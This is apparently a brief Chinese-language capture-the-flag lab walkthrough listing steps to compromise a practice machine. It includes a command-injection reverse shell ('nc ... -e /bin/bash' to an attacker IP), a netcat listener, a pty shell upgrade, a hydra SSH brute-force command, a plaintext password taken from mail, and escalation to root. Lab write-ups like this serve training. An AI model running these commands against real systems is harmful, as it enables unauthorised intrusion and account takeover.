1.主机扫描
2.端口扫描
3.测试访问web服务器页面
4.尝试爆破web登录界面
cd /usr/share/john/
cp password.ist ~/Desktop
5.抓取命令包
7.执行命令反弹shell
nc+10.3.139.75+666+-e+/bin/bashls
sudo nc -lvvp 666
python -c ‘import pty;pty.spawn("/bin/sh")’
8.查看用户
9.根据提示密码本破解家目录下的所有用户
hydra -L user.txt -P pass.txt ssh://10.3.139.72
10.SSH登录jim用户
cd /var/mail/
11.根据邮件上的密码登录charles用户
ssh [email protected]
Password is: ^xHhA&hvim0y
12.切到wxk用户 获得root权限
13.切到root目录下,查看flag
